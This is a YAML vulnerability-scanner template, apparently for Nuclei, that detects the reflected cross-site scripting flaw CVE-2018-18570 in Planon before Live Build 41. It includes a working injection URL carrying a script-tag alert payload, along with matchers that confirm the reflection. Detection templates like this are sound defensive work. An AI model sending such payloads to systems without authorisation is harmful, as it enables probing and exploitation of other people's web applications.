50 lines
1.8 KiB
YAML
50 lines
1.8 KiB
YAML
id: CVE-2018-18570
|
|
|
|
info:
|
|
name: Planon <Live Build 41 - Cross-Site Scripting
|
|
author: emadshanab
|
|
severity: medium
|
|
description: Planon before Live Build 41 is vulnerable to cross-site scripting.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
|
|
remediation: |
|
|
Apply the latest patch or upgrade to a non-vulnerable version of Planon Live Build.
|
|
reference:
|
|
- https://www2.deloitte.com/de/de/pages/risk/articles/planon-cross-site-scripting.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-18570
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2018-18570
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00098
|
|
epss-percentile: 0.39642
|
|
cpe: cpe:2.3:a:planonsoftware:planon:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: planonsoftware
|
|
product: planon
|
|
tags: cve,cve2018,xss,planon,planonsoftware
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html?nodatamsg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "</script><script>alert(document.domain)</script>"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100870181dff2cc23ffa33481a36635ca4a4f911568dce9684506b7821543d13142022100e1061c9704ccc5dd1a6f543126424fe9367250781f89af9d135c8d268b6c6909:922c64590222798bb761d5b6d8e72950 |